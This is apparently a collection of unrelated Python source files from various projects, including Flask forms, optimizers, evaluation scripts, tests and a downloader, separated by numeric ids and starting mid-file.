function_name=self._function_name)
@property
def function_name(self):
return self._function_name
@property
def schema(self):
return self._schema
def exists(self):
query = '''
SELECT 1 FROM information_schema.routines
WHERE routine_schema = '{schema}'
AND routine_name = '{function_name}'
'''.format(
schema=self._schema,
function_name=self._function_name)
return len(self._session.execute(query).fetchall()) > 0
class URLTarget(Target):
'''
Accepts both local paths and urls
'''
def __init__(self, url):
self.path = url
scheme = urlparse(url).scheme
if scheme == '':
self.url = 'file://{}'.format(url)
else:
self.url = url
def exists(self):
try:
urlopen(self.url)
return True
except URLError:
return False
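# Hypothetical usage sketch:
#   URLTarget('https://example.com/data.csv').exists()  # True if the URL responds
#   URLTarget('/tmp/data.csv').exists()                  # local paths are wrapped as file:// URLs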
|
61622
|
from flask_wtf import FlaskForm
from wtforms import HiddenField, FloatField, SelectField, StringField, SubmitField, ValidationError
from wtforms.ext.sqlalchemy.fields import QuerySelectField
from wtforms.validators import Length, Optional, Required
from .. models import EventFrameAttributeTemplate, Lookup, LookupValue, UnitOfMeasurement
class EventFrameAttributeTemplateForm(FlaskForm):
name = StringField("Name", validators = [Required(), Length(1, 45)])
description = StringField("Description", validators = [Length(0, 255)])
lookup = QuerySelectField("Lookup", validators = [Required()], get_label = "Name")
defaultStartLookupValue = SelectField("Default Start Value", validators = [Optional()], coerce = float)
defaultEndLookupValue = SelectField("Default End Value", validators = [Optional()], coerce = float)
unitOfMeasurement = QuerySelectField("Unit", query_factory = lambda: UnitOfMeasurement.query. \
order_by(UnitOfMeasurement.Abbreviation), get_label = "Abbreviation")
defaultStartValue = FloatField("Default Start Value", validators = [Optional()])
defaultEndValue = FloatField("Default End Value", validators = [Optional()])
eventFrameAttributeTemplateId = HiddenField()
eventFrameTemplateId = HiddenField()
requestReferrer = HiddenField()
submit = SubmitField("Save")
def validate_name(self, field):
validationError = False
eventFrameAttributeTemplate = EventFrameAttributeTemplate.query.filter_by(EventFrameTemplateId = self.eventFrameTemplateId.data,
Name = field.data).first()
if eventFrameAttributeTemplate:
if self.eventFrameAttributeTemplateId.data == "":
# Trying to add a new eventFrameAttributeTemplate using a name that already exists.
validationError = True
else:
if int(self.eventFrameAttributeTemplateId.data) != eventFrameAttributeTemplate.EventFrameAttributeTemplateId:
# Trying to change the name of an eventFrameAttributeTemplate to a name that already exists.
validationError = True
if validationError:
raise ValidationError('The name "{}" already exists.'.format(field.data))
|
61645
|
from __future__ import print_function
def one(a=123, b='234', c={'3': [4, '5']}):
for i in range(1): # one
a = b = c['side'] = 'effect'
two()
def two(a=123, b='234', c={'3': [4, '5']}):
for i in range(1): # two
a = b = c['side'] = 'effect'
three()
def three(a=123, b='234', c={'3': [4, '5']}):
for i in range(1): # three
a = b = c['side'] = 'effect'
four()
def four(a=123, b='234', c={'3': [4, '5']}):
for i in range(1): # four
a = b = c['side'] = 'effect'
five()
def five(a=123, b='234', c={'3': [4, '5']}):
six()
six()
six()
a = b = c['side'] = in_five = 'effect'
for i in range(1): # five
return i # five
def six():
pass
if __name__ == "__main__":
from hunter import *
from utils import DebugCallPrinter
trace(
Backlog(stack=15, vars=True, action=DebugCallPrinter(' [' 'backlog' ']'), function='five').filter(~Q(function='six')),
action=DebugCallPrinter
)
one()
one() # make sure Backlog is reusable (doesn't have storage side-effects)
stop()
|
61670
|
from __future__ import absolute_import, division, print_function, unicode_literals
import os
print("VAR is '{}'".format(os.environ["VAR"]))
|
61685
|
class CRSError(Exception):
pass
class DriverError(Exception):
pass
class TransactionError(RuntimeError):
pass
class UnsupportedGeometryTypeError(Exception):
pass
class DriverIOError(IOError):
pass
|
61697
|
import pprint
from pathlib import Path
from typing import Optional
import typer
from embeddings.defaults import RESULTS_PATH
from embeddings.evaluator.sequence_labeling_evaluator import SequenceLabelingEvaluator
from embeddings.pipeline.flair_sequence_labeling import FlairSequenceLabelingPipeline
app = typer.Typer()
def run(
embedding_name: str = typer.Option(
"allegro/herbert-base-cased", help="Hugging Face embedding model name or path."
),
dataset_name: str = typer.Option(
"clarin-pl/kpwr-ner", help="Hugging Face dataset name or path."
),
input_column_name: str = typer.Option(
"tokens", help="Column name that contains text to classify."
),
target_column_name: str = typer.Option(
"ner", help="Column name that contains tag labels for POS tagging."
),
root: str = typer.Option(RESULTS_PATH.joinpath("pos_tagging")),
hidden_size: int = typer.Option(256, help="Number of hidden states in RNN."),
evaluation_mode: SequenceLabelingEvaluator.EvaluationMode = typer.Option(
SequenceLabelingEvaluator.EvaluationMode.CONLL,
help="Evaluation mode. Supported modes: [unit, conll, strict].",
),
tagging_scheme: Optional[SequenceLabelingEvaluator.TaggingScheme] = typer.Option(
None, help="Tagging scheme. Supported schemes: [IOB1, IOB2, IOE1, IOE2, IOBES, BILOU]"
),
) -> None:
typer.echo(pprint.pformat(locals()))
output_path = Path(root, embedding_name, dataset_name)
output_path.mkdir(parents=True, exist_ok=True)
pipeline = FlairSequenceLabelingPipeline(
embedding_name,
dataset_name,
input_column_name,
target_column_name,
output_path,
hidden_size,
evaluation_mode,
tagging_scheme,
)
result = pipeline.run()
typer.echo(pprint.pformat(result))
typer.run(run)
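# Hypothetical command-line usage (the script name is a placeholder; option names
# follow typer's default underscore-to-dash conversion of the parameters above):
#   python evaluate_flair_sequence_labeling.py \
#       --embedding-name allegro/herbert-base-cased \
#       --dataset-name clarin-pl/kpwr-ner --hidden-size 256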
|
61805
|
import os
from rlib.streamio import open_file_as_stream
from rlib.string_stream import StringStream
from som.compiler.class_generation_context import ClassGenerationContext
from som.interp_type import is_ast_interpreter
if is_ast_interpreter():
from som.compiler.ast.parser import Parser
else:
from som.compiler.bc.parser import Parser
def compile_class_from_file(path, filename, system_class, universe):
fname = path + os.sep + filename + ".som"
try:
input_file = open_file_as_stream(fname, "r")
try:
parser = Parser(input_file, fname, universe)
result = _compile(parser, system_class, universe)
finally:
input_file.close()
except OSError:
raise IOError()
cname = result.get_name()
cname_str = cname.get_embedded_string()
if filename != cname_str:
from som.vm.universe import error_println
error_println(
"File name %s does not match class name %s." % (filename, cname_str)
)
universe.exit(1)
return result
def compile_class_from_string(stream, system_class, universe):
parser = Parser(StringStream(stream), "$str", universe)
result = _compile(parser, system_class, universe)
return result
def _compile(parser, system_class, universe):
cgc = ClassGenerationContext(universe)
result = system_class
parser.classdef(cgc)
if not system_class:
result = cgc.assemble()
else:
cgc.assemble_system_class(result)
return result
|
61827
|
import numpy as np
from opytimizer.optimizers.swarm import sso
from opytimizer.spaces import search
def test_sso_params():
params = {
'C_w': 0.1,
'C_p': 0.4,
'C_g': 0.9
}
new_sso = sso.SSO(params=params)
assert new_sso.C_w == 0.1
assert new_sso.C_p == 0.4
assert new_sso.C_g == 0.9
def test_sso_params_setter():
new_sso = sso.SSO()
try:
new_sso.C_w = 'a'
except:
new_sso.C_w = 0.1
try:
new_sso.C_w = -1
except:
new_sso.C_w = 0.1
assert new_sso.C_w == 0.1
try:
new_sso.C_p = 'b'
except:
new_sso.C_p = 0.4
try:
new_sso.C_p = 0.05
except:
new_sso.C_p = 0.4
assert new_sso.C_p == 0.4
try:
new_sso.C_g = 'c'
except:
new_sso.C_g = 0.9
try:
new_sso.C_g = 0.35
except:
new_sso.C_g = 0.9
assert new_sso.C_g == 0.9
def test_sso_compile():
search_space = search.SearchSpace(n_agents=10, n_variables=2,
lower_bound=[0, 0], upper_bound=[10, 10])
new_sso = sso.SSO()
new_sso.compile(search_space)
try:
new_sso.local_position = 1
except:
new_sso.local_position = np.array([1])
assert new_sso.local_position == np.array([1])
def test_sso_evaluate():
def square(x):
return np.sum(x**2)
search_space = search.SearchSpace(n_agents=10, n_variables=2,
lower_bound=[0, 0], upper_bound=[10, 10])
new_sso = sso.SSO()
new_sso.compile(search_space)
new_sso.evaluate(search_space, square)
def test_sso_update():
search_space = search.SearchSpace(n_agents=10, n_variables=2,
lower_bound=[0, 0], upper_bound=[10, 10])
new_sso = sso.SSO()
new_sso.compile(search_space)
new_sso.update(search_space)
|
61830
|
import matplotlib.pyplot as plt
import netomaton as ntm
import numpy as np
if __name__ == '__main__':
# NKS page 443 - Rule 122R
network = ntm.topology.cellular_automaton(n=100)
# carefully chosen initial conditions
previous_state = [1, 1, 0, 0, 1, 1, 0, 0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 0, 1, 1, 1,
0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 0, 1, 1, 0, 1, 0, 1, 1, 1, 1, 0, 1, 0, 1, 1, 0, 1, 1, 1, 1, 0, 0,
1, 0, 0, 0, 1, 1, 1, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 0, 1, 0, 1, 1, 1, 0, 1, 1, 0, 0, 0, 0, 1, 1,
0, 0, 1, 1]
initial_conditions = [1, 1, 1, 0, 1, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0,
0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1,
1, 1, 1, 0, 1, 1, 1]
trajectory = ntm.evolve(initial_conditions=initial_conditions, network=network,
activity_rule=ntm.ReversibleRule(ntm.rules.nks_ca_rule(122)),
past_conditions=[previous_state], timesteps=1002)
timestep = []
average_node_entropies = []
activities = ntm.get_activities_over_time_as_list(trajectory)
for i, c in enumerate(activities):
timestep.append(i)
bit_string = ''.join([str(x) for x in c])
average_node_entropies.append(ntm.average_node_entropy(activities[:i+1]))
print("%s, %s" % (i, average_node_entropies[-1]))
plt.subplot(3, 1, (1, 2))
plt.title("Avg. Node (Shannon) Entropy")
plt.gca().set_xlim(0, 1002)
plt.gca().axes.xaxis.set_ticks([])
plt.plot(timestep, average_node_entropies)
plt.subplot(3, 1, 3)
plt.gca().axes.yaxis.set_ticks([])
ntm.plot_grid(np.array(activities).T.tolist())
|
61831
|
import argparse
import csv
import sys
import os
sys.path.append(os.path.dirname(os.path.dirname(__file__)))
from modules.metric import mean_reciprocal_rank
def main(csv_path):
acc = 0
num = 0
with open(csv_path, "r") as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
line_count = 0
for row in csv_reader:
if line_count > 0:
hum_id = row[0].split(".")[0]
preds = []
for col in row[1:]:
preds.append(str(col))
print(hum_id, mean_reciprocal_rank(preds, str(hum_id)))
acc += mean_reciprocal_rank(preds, str(hum_id))
num += 1
line_count += 1
print(f'Processed {line_count} lines.')
return acc / num
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--csv_path", type=str, required=True, help="path to predict csv")
args = parser.parse_args()
mrr = main(args.csv_path)
print("-----------------------------")
print(f"MRR: {mrr}")
|
61838
|
import collections
from heapq import heappop, heappush
from typing import List
class Solution:
def leastInterval(self, tasks: List[str], n: int) -> int:
tasksDict = collections.Counter(tasks)
heap = []
c = 0
for k, v in tasksDict.items():
heappush(heap, (-v, k))
while heap:
i = 0
stack = []
while i <= n:
if len(heap) > 0:
index, task = heappop(heap)
if index != -1:
stack.append((index + 1, task))
c += 1
if len(heap) == 0 and len(stack) == 0:
break
i += 1
for i in stack:
heappush(heap, i)
return c
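# Hypothetical usage sketch (classic LeetCode 621 example; the known answer is 8):
#   Solution().leastInterval(["A", "A", "A", "B", "B", "B"], 2)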
|
61886
|
import tensorflow as tf
import numpy as np
from blackbox_mpc.optimizers.optimizer_base import OptimizerBase
class PSOOptimizer(OptimizerBase):
def __init__(self, env_action_space, env_observation_space,
planning_horizon=50, max_iterations=5, population_size=500,
num_agents=5, c1=tf.constant(0.3, dtype=tf.float32),
c2=tf.constant(0.5, dtype=tf.float32), w=tf.constant(0.2, dtype=tf.float32),
initial_velocity_fraction=tf.constant(0.01, dtype=tf.float32)):
"""
This class defines the particle swarm optimizer.
(https://www.cs.tufts.edu/comp/150GA/homeworks/hw3/_reading6%201995%20particle%20swarming.pdf)
Parameters
        ----------
env_action_space: gym.ActionSpace
Defines the action space of the gym environment.
env_observation_space: gym.ObservationSpace
Defines the observation space of the gym environment.
planning_horizon: Int
            Defines the planning horizon for the optimizer (how many steps to look ahead and optimize for).
        max_iterations: tf.int32
            Defines the maximum number of iterations the optimizer uses to refine its guess for the optimal solution.
        population_size: tf.int32
            Defines the population size of the particles evaluated at each iteration.
        num_agents: tf.int32
            Defines the number of runners running in parallel.
c1: tf.float32
Defines the fraction of the local best known position direction.
c2: tf.float32
Defines the fraction of the global best known position direction.
w: tf.float32
Defines the fraction of the current velocity to use.
initial_velocity_fraction: tf.float32
Defines the initial velocity fraction out of the action space.
"""
super(PSOOptimizer, self).__init__(name=None,
planning_horizon=planning_horizon,
max_iterations=max_iterations,
num_agents=num_agents,
env_action_space=env_action_space,
env_observation_space=
env_observation_space)
self._solution_dim = [self._num_agents, tf.constant(self._planning_horizon, dtype=tf.int32), self._dim_U]
self._solution_size = tf.reduce_prod(self._solution_dim)
self._population_size = population_size
self._particle_positions = tf.Variable(tf.zeros([self._population_size, *self._solution_dim], dtype=tf.float32))
self._particle_velocities = tf.Variable(tf.zeros([self._population_size, *self._solution_dim], dtype=tf.float32))
self._particle_best_known_position = tf.Variable(tf.zeros([self._population_size, *self._solution_dim],
dtype=tf.float32))
self._particle_best_known_reward = tf.Variable(tf.zeros([self._population_size, self._num_agents],
dtype=tf.float32))
#global
self._global_best_known_position = tf.Variable(tf.zeros([*self._solution_dim], dtype=tf.float32))
self._global_best_known_reward = tf.Variable(tf.zeros([self._num_agents], dtype=tf.float32))
solution_variance_values = np.tile(np.square(self._action_lower_bound - self._action_upper_bound) / 16,
[self._planning_horizon * self._num_agents, 1])
solution_variance_values = solution_variance_values.reshape([self._num_agents, self._planning_horizon, -1])
self._solution_variance = tf.constant(solution_variance_values, dtype=tf.float32)
self._c1 = c1
self._c2 = c2
self._w = w
self._initial_velocity_fraction = initial_velocity_fraction
self._solution = tf.Variable(tf.zeros([self._num_agents, self._dim_U], dtype=tf.float32))
@tf.function
def _optimize(self, current_state, time_step):
def continue_condition(t, position):
result = tf.less(t, self._max_iterations)
return result
def iterate(t, position):
#evaluate each of the particles
# Evaluate and sort solutions
feasible_particle_positions = tf.clip_by_value(self._particle_positions, self._action_lower_bound_horizon,
self._action_upper_bound_horizon)
penalty = tf.norm(tf.reshape(self._particle_positions - feasible_particle_positions, [self._population_size, self._num_agents, -1]),
axis=2) ** 2
self._particle_positions.assign(feasible_particle_positions)
rewards = self._trajectory_evaluator(current_state, self._particle_positions, time_step) - penalty
#set the best local known position
condition = tf.less(self._particle_best_known_reward, rewards)
new_particle_best_known_position = tf.where(tf.expand_dims(tf.expand_dims(condition, -1), -1), self._particle_positions,
self._particle_best_known_position)
self._particle_best_known_position.assign(new_particle_best_known_position)
new_particle_best_known_reward = tf.where(condition, rewards,
self._particle_best_known_reward)
self._particle_best_known_reward.assign(new_particle_best_known_reward)
#get the global best now
global_best_known_position_index = tf.math.argmax(self._particle_best_known_reward)
samples = tf.transpose(self._particle_best_known_position, [1, 0, 2, 3])
global_best_known_position_index = tf.cast(global_best_known_position_index, dtype=tf.int32) + tf.range(0, samples.shape[0], dtype=tf.int32) * samples.shape[1]
samples = tf.reshape(samples, [-1, *samples.shape[2:]])
self._global_best_known_position.assign(tf.gather(samples, global_best_known_position_index))
samples = tf.reshape(self._particle_best_known_reward, [-1])
self._global_best_known_reward.assign(tf.gather(samples, global_best_known_position_index))
#calculate the velocity now
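            # The assignment below is the standard PSO velocity/position update,
            # here with normally distributed random scaling factors:
            #   v_new = w * v + c1 * r1 * (p_best - x) + c2 * r2 * (g_best - x)
            #   x_new = x + v_new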
adapted_particle_velocities = (self._particle_velocities * self._w) + \
(self._particle_best_known_position - self._particle_positions) * self._c1 * tf.random.normal(shape=[], dtype=tf.float32) + \
(self._global_best_known_position - self._particle_positions) * self._c2 * tf.random.normal(shape=[], dtype=tf.float32)
self._particle_velocities.assign(adapted_particle_velocities)
self._particle_positions.assign(self._particle_positions + self._particle_velocities)
return t + tf.constant(1, dtype=tf.int32), self._global_best_known_position
_ = tf.while_loop(cond=continue_condition, body=iterate, loop_vars=[tf.constant(0, dtype=tf.int32), self._global_best_known_position])
self._solution.assign(self._global_best_known_position[:, 0, :])
# update the particles position for the next iteration
lower_bound_dist = self._global_best_known_position - self._action_lower_bound_horizon
upper_bound_dist = self._action_upper_bound_horizon - self._global_best_known_position
constrained_variance = tf.minimum(tf.minimum(tf.square(lower_bound_dist / tf.constant(2, dtype=tf.float32)),
tf.square(upper_bound_dist / tf.constant(2, dtype=tf.float32))),
self._solution_variance)
samples_positions = tf.random.truncated_normal([self._population_size,
*self._solution_dim],
tf.concat([self._global_best_known_position[:, 1:],
tf.expand_dims(self._global_best_known_position[:, -1],
1)], 1),
tf.sqrt(constrained_variance),
dtype=tf.float32)
action_space = self._action_upper_bound_horizon - self._action_lower_bound_horizon
initial_velocity = self._initial_velocity_fraction * action_space
samples_velocities = tf.random.uniform([self._population_size, *self._solution_dim], -initial_velocity,
initial_velocity, dtype=tf.float32)
self._particle_positions.assign(samples_positions)
self._particle_velocities.assign(samples_velocities)
self._particle_best_known_position.assign(samples_positions)
self._particle_best_known_reward.assign(tf.fill([self._population_size, self._num_agents],
tf.constant(-np.inf, dtype=tf.float32)))
self._global_best_known_reward.assign(tf.fill([self._num_agents],
tf.constant(-np.inf, dtype=tf.float32)))
#end update particles
resulting_action = self._solution
return resulting_action
def reset(self):
"""
This method resets the optimizer to its default state at the beginning of the trajectory/episode.
"""
samples_positions = tf.random.uniform([self._population_size, *self._solution_dim], self._action_lower_bound_horizon,
self._action_upper_bound_horizon, dtype=tf.float32)
action_space = self._action_upper_bound_horizon - self._action_lower_bound_horizon
initial_velocity = self._initial_velocity_fraction * action_space
samples_velocities = tf.random.uniform([self._population_size, *self._solution_dim], -initial_velocity,
initial_velocity, dtype=tf.float32)
self._particle_positions.assign(samples_positions)
self._particle_velocities.assign(samples_velocities)
self._particle_best_known_position.assign(samples_positions)
self._particle_best_known_reward.assign(tf.fill([self._population_size, self._num_agents],
tf.constant(-np.inf, dtype=tf.float32)))
self._global_best_known_reward.assign(tf.fill([self._num_agents],
tf.constant(-np.inf, dtype=tf.float32)))
return
|
61906
|
import os
from factory import create_app
app = create_app()
app.app_context().push()
@app.teardown_request
def teardown_request(*args, **kwargs):
'Expire and remove the session after each request'
from database import db
db.session.expire_all()
db.session.remove()
if 'Development' in os.environ.get('SERVER_SOFTWARE', ''):
from tests.conftest import create_dev_data
from database import db
create_dev_data(db.session)
if __name__ == "__main__":
app.run()
|
61948
|
from bagua.torch_api.contrib.cached_dataset import CachedDataset
from torch.utils.data.dataset import Dataset
import numpy as np
import logging
import unittest
from tests import skip_if_cuda_available
logging.basicConfig(level=logging.DEBUG)
class MyDataset(Dataset):
def __init__(self, size):
self.size = size
self.dataset = [(np.random.rand(5, 2), np.random.rand(1)) for _ in range(size)]
def __getitem__(self, item):
return self.dataset[item]
def __len__(self):
return self.size
class TestCacheDataset(unittest.TestCase):
def check_dataset(self, dataset, cache_dataset):
for _ in range(10):
for _, _ in enumerate(cache_dataset):
pass
for i in range(len(dataset)):
self.assertTrue((dataset[i][0] == cache_dataset[i][0]).all())
self.assertTrue((dataset[i][1] == cache_dataset[i][1]).all())
@skip_if_cuda_available()
def test_redis(self):
dataset1 = MyDataset(102)
dataset2 = MyDataset(102)
cache_dataset1 = CachedDataset(
dataset1,
backend="redis",
dataset_name="d1",
)
cache_dataset2 = CachedDataset(
dataset2,
backend="redis",
dataset_name="d2",
)
cache_dataset1.cache_loader.store.clear()
self.check_dataset(dataset1, cache_dataset1)
self.assertEqual(cache_dataset1.cache_loader.num_keys(), len(dataset1))
self.check_dataset(dataset2, cache_dataset2)
self.assertEqual(
cache_dataset2.cache_loader.num_keys(), len(dataset1) + len(dataset2)
)
if __name__ == "__main__":
unittest.main()
|
61970
|
from glyphNameFormatter.data.scriptPrefixes import scriptPrefixes
def process(self):
if self.has("LATIN"):
self.scriptTag = scriptPrefixes['latin']
if self.has("ARMENIAN"):
# self.scriptTag = scriptPrefixes['armenian']
self.processAs("Armenian")
elif self.has("HEBREW"):
# self.scriptTag = scriptPrefixes['hebrew']
self.processAs("Hebrew")
self.edit("LATIN SMALL LIGATURE FFI", "f_f_i")
self.edit("LATIN SMALL LIGATURE FFL", "f_f_l")
self.edit("LATIN SMALL LIGATURE FF", "f_f")
self.edit("LATIN SMALL LIGATURE FI", "fi")
self.edit("LATIN SMALL LIGATURE FL", "fl")
self.edit("LATIN SMALL LIGATURE LONG S T", "longs_t")
self.edit("LATIN SMALL LIGATURE ST", "s_t")
self.compress()
if __name__ == "__main__":
from glyphNameFormatter.exporters import printRange
printRange("Alphabetic Presentation Forms")
|
62005
|
from .Setup import EngineSetup
from Core.GlobalExceptions import Exceptions
from Services.NetworkRequests import requests
from Services.Utils.Utils import Utils
class ClipDownloader(EngineSetup):
def run(self):
try:
self.download()
except:
self.status.raiseError(Exceptions.NetworkError)
self.status.setDone()
self.syncStatus()
def download(self):
response = requests.get(self.setup.downloadInfo.getUrl(), stream=True)
if response.status_code == 200:
self.progress.totalByteSize = int(response.headers.get("Content-Length", 0))
self.progress.totalSize = Utils.formatByteSize(self.progress.totalByteSize)
self.status.setDownloading()
self.syncStatus()
try:
with open(self.setup.downloadInfo.getAbsoluteFileName(), "wb") as file:
loopCount = 0
for data in response.iter_content(1024):
file.write(data)
self.progress.byteSize += len(data)
self.progress.size = Utils.formatByteSize(self.progress.byteSize)
if loopCount % 1024 == 0:
self.syncProgress()
loopCount += 1
self.syncProgress()
except:
self.status.raiseError(Exceptions.FileSystemError)
else:
if self.progress.byteSize != self.progress.totalByteSize:
raise
else:
raise
def cancel(self):
pass
|
62011
|
from datetime import date
from typing import Type
import pytest
import sympy
from sympy import Interval, oo
from nettlesome.entities import Entity
from nettlesome.predicates import Predicate
from nettlesome.quantities import Comparison, Q_, Quantity
class TestComparisons:
def test_comparison_with_wrong_comparison_symbol(self):
with pytest.raises(ValueError):
_ = Comparison(
content="the height of {} was {}",
sign=">>",
expression=Q_("160 centimeters"),
)
def test_comparison_interval(self):
comparison = Comparison(
content="the distance between $place1 and $place2 was",
sign=">",
expression=Q_("20 miles"),
)
assert comparison.interval == Interval(20, oo, left_open=True)
def test_comparison_not_equal(self):
comparison = Comparison(
content="the distance between $place1 and $place2 was",
sign="!=",
expression=Q_("20 miles"),
)
assert comparison.interval == sympy.Union(
Interval(0, 20, right_open=True), Interval(20, oo, left_open=True)
)
class TestPredicates:
def test_no_sign_allowed_for_predicate(self):
with pytest.raises(TypeError):
Predicate(
"the date when $work was created was",
sign=">=",
expression=date(1978, 1, 1),
)
def test_term_positions(self):
predicate = Predicate(
content="$organizer1 and $organizer2 planned for $player1 to play $game with $player2."
)
assert predicate.term_positions() == {
"organizer1": {0, 1},
"organizer2": {0, 1},
"player1": {2, 4},
"game": {3},
"player2": {2, 4},
}
def test_term_positions_with_repetition(self):
predicate = Predicate(
content="$organizer1 and $organizer2 planned for $organizer1 to play $game with $organizer2."
)
assert predicate.term_positions() == {
"organizer1": {0, 1},
"organizer2": {0, 1},
"game": {2},
}
def test_term_permutations(self):
predicate = Predicate(
content="$organizer1 and $organizer2 planned for $player1 to play $game with $player2."
)
assert predicate.term_index_permutations() == [
(0, 1, 2, 3, 4),
(0, 1, 4, 3, 2),
(1, 0, 2, 3, 4),
(1, 0, 4, 3, 2),
]
def test_term_permutations_with_repetition(self):
predicate = Predicate(
content="$organizer1 and $organizer2 planned for $organizer1 to play $game with $organizer2."
)
assert predicate.term_index_permutations() == [
(0, 1, 2),
(1, 0, 2),
]
def test_convert_false_statement_about_quantity_to_obverse(self, make_predicate):
assert make_predicate["p7_obverse"].truth is True
assert make_predicate["p7_obverse"].quantity == Q_(35, "foot")
assert make_predicate["p7"].truth is True
assert make_predicate["p7"].sign == "<="
assert "sign='<='" in repr(make_predicate["p7"])
assert make_predicate["p7_obverse"].sign == "<="
def test_quantity_type(self, make_predicate):
assert isinstance(make_predicate["p7"].quantity, Quantity)
def test_string_for_date_as_expression(self):
copyright_date_range = Comparison(
content="the date when $work was created was",
sign=">=",
expression=date(1978, 1, 1),
)
assert str(copyright_date_range).endswith("1978-01-01")
def test_quantity_string(self, make_predicate):
assert str(make_predicate["p7"].quantity) == "35 foot"
def test_predicate_content_comparison(self, make_predicate):
assert make_predicate["p8_exact"].content == make_predicate["p7"].content
def test_expression_comparison(self, make_predicate):
assert str(make_predicate["p7"].quantity_range) == "no more than 35 foot"
assert str(make_predicate["p9"].quantity_range) == "no more than 5 foot"
def test_predicate_has_no_expression_comparison(self, make_predicate):
with pytest.raises(AttributeError):
make_predicate["p1"].expression_comparison() == ""
def test_context_slots(self, make_predicate):
assert len(make_predicate["p7"]) == 2
def test_str_for_predicate_with_number_quantity(self, make_predicate):
assert "distance between $place1 and $place2 was at least 20" in str(
make_predicate["p8_int"]
)
assert "distance between $place1 and $place2 was at least 20.0" in str(
make_predicate["p8_float"]
)
assert "distance between $place1 and $place2 was at least 20 foot" in str(
make_predicate["p8"]
)
def test_template_singular_by_default(self):
predicate = Predicate(content="$people were in $city")
assert str(predicate.template) == 'StatementTemplate("$people was in $city")'
@pytest.mark.parametrize(
"context, expected",
[
(
[Entity(name="the book", plural=False)],
"<the book> was names, towns,",
),
(
[Entity(name="the book's listings", plural=True)],
"<the book's listings> were names, towns,",
),
],
)
def test_make_str_plural(self, context, expected):
phrase = (
"$thing were names, towns, and telephone numbers of telephone subscribers"
)
predicate = Predicate(content=phrase)
with_context = predicate._content_with_terms(context)
assert with_context.startswith(expected)
def test_str_not_equal(self, make_predicate):
assert (
"the distance between $place1 and $place2 was not equal to 35 foot"
in str(make_predicate["p7_not_equal"])
)
def test_negated_method(self, make_predicate):
assert make_predicate["p7"].negated().means(make_predicate["p7_opposite"])
assert make_predicate["p3"].negated().means(make_predicate["p3_false"])
class TestSameMeaning:
def test_predicate_equality(self, make_predicate):
assert make_predicate["p1"].means(make_predicate["p1_again"])
def test_predicate_inequality(self, make_predicate, watt_factor):
assert not make_predicate["p2"].means(make_predicate["p2_reflexive"])
def test_error_predicate_means_fact(self, make_predicate, watt_factor):
with pytest.raises(TypeError):
make_predicate["p2"].means(watt_factor["f2"])
def test_obverse_predicates_equal(self, make_predicate):
assert make_predicate["p7"].means(make_predicate["p7_obverse"])
def test_equal_float_and_int(self, make_predicate):
"""
These now evaluate equal even though their equal quantities are different types
"""
assert make_predicate["p8_int"].means(make_predicate["p8_float"])
def test_same_meaning_float_and_int(self, make_predicate):
"""
The Predicate means method considers equal quantities of different types to have the same meaning.
"""
assert make_predicate["p8_int"].means(make_predicate["p8_float"])
def test_no_equality_with_inconsistent_dimensionality(self, make_predicate):
assert not make_predicate["p9"].means(make_predicate["p9_acres"])
def test_different_truth_value_prevents_equality(self, make_predicate):
assert not make_predicate["p_murder"].means(make_predicate["p_murder_whether"])
assert not make_predicate["p_murder_false"].means(
make_predicate["p_murder_whether"]
)
assert not make_predicate["p_murder_false"].means(make_predicate["p_murder"])
def test_predicate_does_not_mean_fact(self, make_predicate, watt_factor):
with pytest.raises(TypeError):
make_predicate["p8"].means(watt_factor["f8"])
def test_term_placeholders_do_not_change_result(self):
left = Predicate(
content="$organizer1 and $organizer2 planned for $player1 to play $game with $player2."
)
right = Predicate(
content="$promoter1 and $promoter2 planned for $player1 to play $chess with $player2."
)
assert left.means(right)
def test_term_positions_change_result(self):
left = Predicate(
content="$organizer1 and $organizer2 planned for $player1 to play $game with $player2."
)
right = Predicate(
content="$organizer1 and $organizer2 planned for $organizer1 to play $game with $organizer2."
)
assert not left.means(right)
class TestImplication:
def test_greater_than_because_of_quantity(self, make_predicate):
assert make_predicate["p8_meters"] > make_predicate["p8"]
assert make_predicate["p8_meters"] != make_predicate["p8"]
def test_greater_float_and_int(self, make_predicate):
assert make_predicate["p8_higher_int"] > make_predicate["p8_float"]
assert make_predicate["p8_int"] < make_predicate["p8_higher_int"]
def test_any_truth_value_implies_none(self, make_predicate):
assert make_predicate["p_murder"] > make_predicate["p_murder_whether"]
assert make_predicate["p_murder_false"] > make_predicate["p_murder_whether"]
def test_no_implication_by_exact_quantity(self, make_predicate):
assert not make_predicate["p_quantity=3"] > make_predicate["p_quantity>5"]
def test_no_implication_of_exact_quantity(self, make_predicate):
assert not make_predicate["p_quantity>5"] > make_predicate["p_quantity=3"]
def test_no_implication_by_greater_or_equal_quantity(self, make_predicate):
assert not make_predicate["p_quantity>=4"] > make_predicate["p_quantity>5"]
def test_no_implication_of_greater_or_equal_quantity(self):
less = Comparison(content="The number of mice was", sign=">", expression=4)
more = Comparison(content="The number of mice was", sign=">=", expression=5)
assert not less.implies(more)
def test_no_contradiction_inconsistent_dimensions(self):
equal = Comparison(
content="${defendant}'s sentence was", sign="=", expression="8 years"
)
less = Comparison(
content="${defendant}'s sentence was", sign="<=", expression="10 parsecs"
)
assert not equal.contradicts(less)
assert not equal.implies(less)
def test_equal_implies_greater_or_equal(self, make_predicate):
assert make_predicate["p9_exact"] > make_predicate["p9"]
def test_implication_with_not_equal(self, make_predicate):
assert make_predicate["p7_opposite"] > make_predicate["p7_not_equal"]
def test_no_implication_with_inconsistent_dimensionality(self, make_predicate):
assert not make_predicate["p9"] >= make_predicate["p9_acres"]
assert not make_predicate["p9"] <= make_predicate["p9_acres"]
def test_implication_with_no_truth_value(self, make_predicate):
assert not make_predicate["p2_no_truth"] > make_predicate["p2"]
